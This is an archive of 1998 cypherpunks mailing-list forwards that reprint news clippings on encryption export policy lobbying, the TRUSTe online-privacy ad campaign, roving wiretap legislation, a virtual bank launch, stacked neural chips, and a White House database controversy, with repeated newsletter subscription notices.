This From: WIRED News, Wednesday October 7, 1998
http://www.wired.com

Privacy Campaign Plods Ahead
http://www.wired.com/news/news/politics/story/15467.html

By
Niall McKay, niall@wired.com

In the wake of a costly ad campaign designed to raise consumer awareness
about the cryptography debate in Washington, a coalition of Internet
industry companies, privacy activists, and elected officials will turn to
letter writing.

The Americans for Computer Privacy [ http://www.computerprivacy.org/ ] said
Wednesday that the group will send a barrage of missives to the government.
One letter will target every member of Congress and stress the need to
build on recent government policy relaxing encryption restrictions with
"solid legislation."

The group will also call on Vice President Al Gore "to make sure that the
good fight to protect American privacy is regulated."

Americans for Computer Privacy has been waging a public campaign to educate
consumers about the complex crypto issue, in an effort to get grassroots
support behind their drive to liberalize the federal government's
encryption policy.

In July, the group launched a TV and Internet advertising campaign designed
to educate consumers about the need for privacy. The campaign was created
by the public-policy advertising firm Goddard-Claussen, best known for its
"Harry & Louise" commercials. That high-profile series featured a yuppie
couple and aimed to undercut the Clinton administration's health-care
reform initiative.

The current campaign by the Americans for Computer Privacy is reportedly
being closely watched by the FBI and other intelligence agencies. At this
point, it is unclear to what degree the campaign has altered the course of
legislation.

In its latest lobbying effort, the group will urge both the White House and
Congress to reconsider legislation that would ease export restrictions on
strong encryption and ban the imposition of mandatory key-recovery features
in software sold in the United States.

The legislation in question includes such bills as the "E-Privacy Act" (S.
2067), the "Security and Freedom Through Encryption Act" (SAFE, HR 695),
and "The Secure Public Networks Act" (S. 909).

The letters are backed by an unusual alliance of Republican and Democrats
including members of congress Bob Goodlatte, (R-Virginia), Rick White
(R-Washington), Zoe Lofgren (D-California) and Samuel Gejdenson
(D-Connecticut), as well as Senators John Ashcroft (R-Missouri), Conrad
Burns (R-Montana), and Ron Wyden (D-Oregon).

Copyright (c) 1994-98 Wired Digital Inc.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.










**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 9 Oct 1998 05:49:31 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.25: TRUSTe Brings Privacy Home
Message-ID: <199810082123.OAA29167@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.25: TRUSTe Brings Privacy Home
Date: Thu, 8 Oct 1998 00:30:34 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.25: TRUSTe Brings Privacy Home
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Thursday October 8, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: WIRED News, October 7, 1998
http://www.wired.com

TRUSTe Brings Privacy Home
http://www.wired.com/news/news/business/story/15462.html

by
James Glave, james@wired.com

9:05 a.m.  7.Oct.98.PDT
The major Web indexing firms have banded together with Web privacy group
TRUSTe [ http://www.truste.org/ ] to launch a national advertising campaign
aimed at educating consumers about online privacy issues.

The campaign, known as Privacy Partnership, will rely on donated banner
ads, distributed across the Net. Microsoft, for example, said it will
donate 20 million banner impressions, or individual viewings, on its
MSN.com service.

Microsoft (MSFT) described Privacy Partnership as a "grassroots campaign,"
but there is nothing small-time about the lineup of Web content and
indexing firms involved. Besides Redmond, AOL (AOL), Excite (XCIT),
Infoseek (SEEK), Lycos (LCOS), Netscape (NSCP), Snap, and Yahoo (YHOO) are
all on board. Lycos is the parent company of Wired Digital, owner of Wired
News.

The Internet advertisements, explaining the importance of protecting
personal data online, will run between 12 and 31 October. All told, the
companies will contribute more than 150 million online advertising
impressions, worth more than US$3 million, in the form of banners and
messages on their Web sites. The campaign is expected to reach about 90
percent of all Internet users in the United States.

"Microsoft's commitment to online privacy is related to our ongoing vision
of empowering the individual to do more through the PC," said Bob Herbold,
Microsoft executive vice president and CEO, in a statement.

The publicity push is designed to bring the Internet privacy debate home to
middle America. The program will bring consumers into a conversation that
has so far been a terse exchange between the Internet industry, which wants
to regulate itself, and government, which is threatening to pass
consumer-protection laws.

"We want to be the first people to ask, 'Why doesn't government work with
business and work with consumers?'" said a source with TRUSTe.

The Federal Trade Commission has cracked down on the Internet industry for
what it claims is a failure to respect personal information relative to
consumers. In August, the commission punished GeoCities for allowing
personal customer information to fall into untrustworthy hands.

The FTC has given the industry until the end of this year to prove that
it's serious about protecting consumer privacy. If that doesn't happen, it
will recommend congress pass laws to do it for them.

A recent survey
[ http://www.wired.com/news/news/politics/story/15428.html ] found that
more than 40 countries have enacted, or plan to enact, consumer
data-protection laws.

TRUSTe is leading the charge to stop the United States from doing the same
thing. The nonprofit industry group runs a program that awards a TRUSTe
seal to Web sites that respect and preserve individual privacy.

"The average citizen... [has] no idea they can't participate in self
regulation," said the TRUSTe source. "If we don't do these things, then
government will fail and self-regulation will fail.

"In the privacy arena, what is really critical is that this is all moving
really fast. The industry is collecting data faster than anyone can stop
them. We want the government to put in the principles so that privacy
doesn't become for the information age what the environment was to the
industrial age."

One Web-privacy advocate agreed, but said that a consumer-education
campaign is a distraction that allows the big Internet companies to shirk
their responsibilities.

"Focusing on 'consumer education' is an attempt to shift responsibility
back on the victim, which makes little sense when those people have so
little technical and legal power to protect their own interests," said
Jason Catlett, president of JunkBusters.

"Detroit tried the same PR trick in the '60s, because telling people that
they should drive more carefully was cheaper than being required to
engineer safer cars and to take responsibility for the numbers of people
that were getting killed," Catlett said.

"How many more horror stories must we read before consumers will get more
than 'You should have chosen better companies' for an answer?"

Last week, the accounting firm of Ernst & Young told Wired News that it had
signed on as a TRUSTe sponsor, and plans to work closely with the group to
establish an e-commerce assurance program.

Copyright (c) 1994-98 Wired Digital Inc.

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.










**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 9 Oct 1998 05:50:20 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.26: Coalition Announces Intiative for Online Privacy
Message-ID: <199810082123.OAA29179@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.26: Coalition Announces Intiative for Online Privacy
Date: Thu, 8 Oct 1998 00:32:02 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.26: Coalition Announces Initiative for Online Privacy
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Thursday October 8, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The New York Times (Cybertimes), October 7, 1998
http://www.nytimes.com

Coalition Announces Initiative for Online Privacy
http://www.nytimes.com/library/tech/98/10/cyber/articles/07privacy.html

By
JERI CLAUSING, jeri@nytimes.com

ASHINGTON -- A coalition of major Internet companies on Wednesday unveiled
a sweeping online advertising campaign to teach consumers and Web sites
operators how to protect personal privacy on the Internet.

The initiative, which is being launched with the equivalent of $4 million
in Internet advertising banner commitments, was described as a huge
grassroots consumer education program that is expected to reach 9 of every
10 Internet users.

Called the Privacy Partnership [ http://www.truste.org/partners/ ], the
campaign was started by TrustE [ http://www.truste.org/ ], an independent,
nonprofit organization dedicated to building trust in the Internet, and
eight major Internet gateways, including America Online, Yahoo!, Excite,
Infoseek, Lycos, Microsoft, Netscape and Snap.

A number of other companies have since joined, and any Web site operator
can download a banner ad that has links to a privacy Web site.

"The Internet is medium for communications and commerce, but users' anxiety
and uncertainty about sharing personal information are preventing people
from taking advantage of the Internet's full potential, " said Susan Scott,
executive director of TrustE."

The announcement comes at a time when companies are working to prove to
federal lawmakers and regulators that they can establish an effective a
voluntary framework to control the use of personal information collected
online. Many of the companies involved in the new partnership are also
members of the Online Privacy Alliance, which has drafted guidelines
http://www.privacyalliance.org/ ] and an enforcement plan for companies to
follow when collecting personal information from consumers on the Internet.

The Clinton Administration, which has taken a hands-off approach to
Internet regulation, supports self-regulation of privacy policies. But the
Federal Trade Commission, which earlier this year released a survey of that
painted a dismal picture of the state of privacy protections online, has
recommended that Congress pass a bill to protect children from online
marketers, and that protections be extended to all consumers if
self-regulation has not made significant progress by January.

On Tuesday, groups pushing for strong privacy laws released a study showing
that nearly all industrialized countries have either adopted or are in the
process of adopting comprehensive privacy laws. The report by the Global
Internet Liberty Campaign, an international coalition of civil rights
groups [ http://www.gilc.org/ ], found that countries are adopting these
laws in many cases to address past governmental abuses, such as in former
Eastern Bloc countries; to promote electronic commerce, or to ensure
compatibility with international standards developed by the European Union,
the Council of Europe, and the Organization for Economic Cooperation and
Development.

"This report shows that there is substantial international support for
privacy protection," said David Banisar, policy director of the Electronic
Privacy Information Center in Washington, D.C., and one of the authors of
the report.

His co-author, Simon Davies, director general of Privacy International,
said, "The United States risks isolating itself from worldwide electronic
commerce with its opposition to adequate and enforceable privacy rights."

On Oct. 25, an European Union directive takes effect that is expected to
toughen national laws of 15 European governments whose privacy standards
are already more stringent than those of the United. The European laws
require that corporations get people's permission before collecting
demographic or marketing information about them. Without strong national
standards in the United States, Banisar said many companies may find
themselves unable to engage in electronic commerce in Europe.

Clinton Administration officials, however, have for months been working
with the European Union trying to convince European officials that the
standards voluntarily being enacted by American companies are sufficient.
And President Clinton's top Internet adviser, Ira C. Magaziner, insists
current efforts by industry will be acceptable.

"Things are moving along well now with self-regulation," Magaziner said
Tuesday. "We still need to see fully implemented results, but I think those
who advocate legislation assume that just as soon as you pass a law
everything is fine. Laws still have to be implemented and enforced. And we
question the effectiveness of enforcement of some of those laws. If
self-regulation works as we are hoping and expect, it will still be the
most effective way."

The Privacy Partnership advertising blitz begins Oct. 12 and will run
through Oct. 31. The campaign will use banner ads with links to a welcome
message from the Privacy Partnership. That message has two links. One takes
people to a TrustE site with information about how consumers can protect
their privacy online. The other will allow Web site operators to join the
Privacy Partnership by downloading the campaign's banner ads. It will also
provide Web site operators with more information on privacy principles and
tools to generate a privacy statement.

"For trust to be engendered on the Internet, companies must clearly state
what personal information they are collecting, how the information will be
used, and the choices available to the individual regarding the collection,
use and distribution of that information," Scott said.

"If we can alleviate consumer anxiety about what happens to their data.
Then everybody will do well."

Copyright 1998 The New York Times Company

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.










**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 9 Oct 1998 05:47:59 +0800
To: cypherpunks@cyberpass.net
Subject: IP: House Passes Roving Wiretaps, Expanding Federal Surveillance Powers
Message-ID: <199810082123.OAA29190@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: House Passes Roving Wiretaps, Expanding Federal Surveillance Powers
Date: Thu, 08 Oct 1998 09:06:44 -0500
To: believer@telepath.com

Source:  Center for Democracy and Technology
http://www.cdt.org/legislation/calea/roving.html

House Passes Roving Wiretaps, Expanding Federal Surveillance Powers 

 October 7, 1998 

In a closed-door manuever, controversial "roving wiretap" provisions have
been added to a major Intelligence authorization bill and passed by the
House. Current wiretapping law allows tapping of a particular person's
phones. The new provisions would dramatically expand current authority by
allowing taps on any phone used by, or "proximate" to, the person being
tapped +IBQ- no matter whose phone it is. Such a broad law invites abuse. 

In the last Congress, the full House of Representatives rejected these
provisions after an open and vigorous debate. This week, behind closed
doors, a conference committee added the provisions to the important
Intelligence Authorization Conference Report, almost certain to pass the
Congress. The provisions were not in either the original House or Senate
versions of the bill. CDT is particularly concerned that such an expansion
of federal authority should take place without a public debate. 


"Roving Wiretaps" Language added to H.R. 3694, the Intelligence
Authorization Conference Report. 

SEC. 604. WIRE AND ELECTRONIC COMMUNICATIONS INTERCEPTION REQUIREMENTS. 

(a) In General.  Section 2518(11)(b) of title 18, United States Code, is
amended - 

(1) in clause (ii), by striking ``of a purpose'' and all that follows
through the end 
of such clause and inserting ``that there is probable cause to believe that
the 
person's actions could have the effect of thwarting interception from a
specified 
facility;''; 

(2) in clause (iii), by striking ``such purpose'' and all that follows
through the end 
of such clause and inserting ``such showing has been adequately made;
and''; and 

(3) by adding at the end the following clause: 

``(iv) the order authorizing or approving the interception is limited to 
interception only for such time as it is reasonable to presume that the
person 
identified in the application is or was reasonably proximate to the
instrument 
through which such communication will be or was transmitted.''. 

(b) Conforming Amendments.Section 2518(12) of title 18, United States Code,
is 
amended - 

(1) by inserting ``(a)'' after ``by reason of subsection (11)''; 

(2) by striking ``the facilities from which, or''; and 

(3) by striking the comma following ``where''. 

 Other CALEA Issues 

The Center For Democracy And Technology 
1634 Eye Street NW, Suite 1100 
 Washington, DC 20006 
 (v) .202.637.9800 (f) .202.637.0968 
info@cdt.org 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 9 Oct 1998 05:50:46 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Cashless CompuBank Launches Today Nationwide
Message-ID: <199810082123.OAA29202@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Cashless CompuBank Launches Today Nationwide
Date: Thu, 08 Oct 1998 09:13:01 -0500
To: believer@telepath.com

VIRTUAL BANK

CompuBank, the first virtual US bank to receive a charter from the Office
of the Comptroller of the Currency and approval from the Federal Deposit
Insurance Corporation, launches today in all US states. It has no physical
branches. As well as the usual bank services, features include real-time
access to accounts 24 hours a day, viewable transaction history for the
last year, and online wire transfers. See http://www.compubank.com  

-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 9 Oct 1998 05:47:44 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Neural Computer to Rival Brain???
Message-ID: <199810082123.OAA29218@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Neural Computer to Rival Brain???
Date: Thu, 08 Oct 1998 09:15:57 -0500
To: believer@telepath.com

Source:  The Economist
http://www.economist.com/editorial/freeforall/current/index_st4636.html

SCIENCE AND TECHNOLOGY 

Semiconductors - Silicon smarts 

BRAINS and computers are very different things.
Brains consist of a trillion or so tiny elements, called
neurons, which are individually dumb but collectively,
thanks to the thousand trillion connections between
them, very powerful. Most computers, on the other
hand, depend on a single, complex component-a
microprocessor-to get things done. Even the most
advanced supercomputers, with hundreds or even
thousands of connected microprocessors, cannot
match the compactness or connection density of the
human brain. 

Two new chip-making techniques being developed at
Irvine Sensors Corporation (ISC) in Costa Mesa,
California, could be significant steps in the
long-running effort to make more brain-like
computers. Researchers at ISC have found a way to
pack silicon chips extremely tightly together and,
better still, to make large numbers of connections
between them. 

Their technique layers silicon chips on top of each
other, cramming 50 chips into the space normally
occupied by just one. This is done by grinding away
the underside of the silicon wafer on which the chip
circuitry is built-a thick, non-functional platform that
can be removed without affecting the chip's
operation. The result is a paper-thin but fully
functional chip, which can be stacked and bonded
with other chips to form a single unit. The chips are
wired together via connectors along their edges, and
the whole sandwich is embedded in epoxy resin. 

This space-saving technique is already being used
commercially in a four-layer memory chip that packs
128 megabits of data into an amazingly small
one-centimetre-square package. Earlier this year, ISC
won a $1.3m military contract from Boeing to build a
wearable, voice-activated computer the size of a
pack of cards. 

But while such stacking wizardry means computers
can be smaller, it does not make them more
brain-like. At present, the nearest approximation to a
silicon brain involves making electronic circuits that
behave like neurons, and connecting them up in small
networks. Such "artificial neural networks" can be
used for everything from image recognition to credit
scoring, but their size and complexity-and so their
deductive power-is limited. 

This is because it is only possible to fit a certain
number of silicon neurons on to a single chip; and
there is a limit to the number of connections that can
be made between adjacent neural chips. Researchers
would like to be able to build networks that are
larger and more densely connected-in short, more
brain-like. ISC's second technology should let them
do this, by allowing direct vertical connections to be
made anywhere on the adjoining surfaces of adjacent
chips in a stack. 

To achieve this, half of a special component called a
three-dimensional field-effect transistor, or 3DFET, is
constructed at the site of each connection, as part of
the usual chip-making process. When the chips are
stacked, the two halves of each 3DFET fit together,
allowing signals to pass up and down from one chip
to the other. A prototype 3DFET, developed with
financing from the US army's ballistic missile defence
organisation, has already been made and tested. With
new funding, ISC hopes to make a chip-stack
connected using 3DFETs within 18 months. 

After that, says ISC's chief technical officer, John
Carson, the long-term goal is to stack 1,000 neural
chips in a single cube. This would involve thinning
each chip down to less than the thickness of a human
hair. Already, ISC has produced a prototype that is
almost this thin. 

If ISC can squeeze a million silicon neurons on to each
chip, and pack a thousand chips into a one-inch
neural cube, the arithmetic starts to get interesting. A
thousand such cubes, which could fit in a shoebox,
would contain a trillion neurons, and a hundred trillion
connections. That would still not match the
connectivity of human grey matter. But it would be
the most brain-like computer ever made. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 9 Oct 1998 05:47:31 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Borderless World Talks, E-commerce
Message-ID: <199810082123.OAA29230@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Borderless World Talks, E-commerce
Date: Thu, 08 Oct 1998 09:19:12 -0500
To: believer@telepath.com

--------------------
NOTE:  You will have to go to the website referenced below to read this
article.  Half of the page is the article in English, the other half in
French.
--------------------

  BORDERLESS WORLD TALKS

     The Organization for Economic Cooperation and Development is holding a
Borderless World ministerial conference in Ottawa this week, in which reps
of the 29 member countries discuss various Internet and e-commerce issues,
especially regulation, taxation and privacy. See
http://www.oecd.org/dsti/sti/it/ec/news/ottawa.htm  

-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 9 Oct 1998 05:55:04 +0800
To: cypherpunks@cyberpass.net
Subject: IP: White House Accused of Data Theft
Message-ID: <199810082124.OAA29249@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: White House Accused of Data Theft
Date: Thu, 08 Oct 1998 10:12:25 -0500
To: believer@telepath.com

Source:  Washington Post
http://search.washingtonpost.com/wp-srv/WAPO/19981007/V000584-100798-idx.html

White House Accused of Data Theft 

By John Solomon
Associated Press Writer
Wednesday, October 7, 1998; 7:42 p.m. EDT

WASHINGTON (AP) -- A Republican-led House subcommittee
accused President Clinton and the White House of ``theft of government
property'' Wednesday in transferring data to the Democratic Party for
fund-raising purposes. 

Seeking to gain the attention of impeachment investigators, a stinging
report written by Republican congressional staffers detailed evidence they
contend conflicts with some of the White House's earlier assertions about
the use of a $1.7 million taxpayer-financed database created inside the
executive mansion. 

``The committee issues this report to expose the evidence of the
president's possible involvement in the theft of government property and
his abuse of power,'' said the report by the investigative subcommittee of
the House Government Reform and Oversight Committee. 

The report cites testimony from top Democratic fund-raisers who
acknowledged they got names and addresses from the White House
database on a regular basis and used them to solicit donations or plan
White House events for donors. 

``Richard Sullivan, the DNC finance director, himself testified that he
obtained lists of attendance at White House CEO lunches and the White
House Economic Conference and that he used those lists to raise money,''
the report states. 

Originally, presidential aides insisted White House staff and the database
were used only for official purposes and none of it was misused for fund
raising. Federal law prohibits the use of government resources for fund
raising or other political or private purposes. Those who misuse such
resources can be charged with stealing government resources. 

White House officials said Wednesday the DNC was only authorized to
use its data for invitation lists, and if information was used for anything
else
that was inappropriate. 

``This White House, like the Bush and Reagan White House, keeps
names and addresses of our supporters, and tries to ensure that they are
included in White House events,'' spokesman Barry Toiv said. 

Toiv charged the subcommittee report was ``irresponsible and deceptive
and highly partisan'' and excluded ``information that contradicts'' its
allegations. 

The report directly accused Clinton of knowing about and instigating the
misuse of federal resources for political purposes. 

Among the examples it cited were internal White House documents
indicating that the president instructed that information he obtained from
official White House e-mail or other sources be sent to his political
campaign. 

``Quite frequently the president will ask that certain names and addresses
be added to the supporter file. ... Attached is a list of supporter file
information,'' a 1994 White House memo said, asking that the information
be forwarded to a separate campaign database Clinton instructed be built
in Arkansas. 

White House officials said there was nothing wrong with Clinton
forwarding to his campaign, for example, business cards he had received
at the White House and said there was no evidence he sent wholesale
portions of government data. 

The report also cites a document showing Clinton authorized a job
description for a top aide, Marsha Scott, that included a responsibility for
``insuring ... supporters were involved in fund-raising activities'' such
as the
controversial White House coffees. 

Presidential aides defended Scott's job description, noting political
appointees aren't forbidden by law from doing political work provided
they don't solicit donations. 

The subcommittee also referred White House deputy counsel Cheryl Mills
to the Justice Department for criminal investigation, alleging that in 1996
she located two subpoenaed documents suggesting that Clinton and his
wife, Hillary, sanctioned the use of the White House database for political
purposes but withheld them from the committee for months -- until after
the 1996 election. It also accused her of lying about aspects of the
database to the committee. 

Ms. Mills has said she did not believe the documents were responsive to
the subpoena when she first reviewed them and sought the advice of her
superiors who agreed. She denies any effort to mislead investigators. And
the top Democrat on the Government Reform committee wrote the Justice
Department saying he disagreed with the GOP referral, saying Ms. Mills
may have made a mistake but there was no evidence of willful obstruction.

The release of the report is part of a broader effort by Republicans in
Congress to make public information that they think should be considered
in the impeachment inquiry the House is set to approve Thursday. 

Rep. David McIntosh, R-Ind., said Wednesday it was ``premature'' to
predict whether his findings would be incorporated into the House
Judiciary Committee's impeachment investigation on the president's
relationship with Monica Lewinsky. 

``This isn't about sex. This is about abusing his official privilege for
personal and political gain,'' McIntosh said. 

The inquiry into the database, which contained the names of individuals
who have contact with the White House or president, has been conducted
over the last two years without the same fanfare of higher profile
investigations of Ms. Lewinsky, Whitewater, FBI files and the White
House travel office firings. 

Nonetheless, the investigators said they found White House documents
with official government data -- including holiday card lists -- at the DNC
and the Clinton campaign. White House officials said some of the list were
accidentally sent by vendors. 

 (c) Copyright 1998 The Associated Press
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 9 Oct 1998 03:28:07 +0800
To: vince@offshore.com.ai
Subject: Re: [Fwd: Here come the rafting iguanas]
In-Reply-To: <361D269A.3494@avana.net>
Message-ID: <v04011789b242b2dc11d3@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



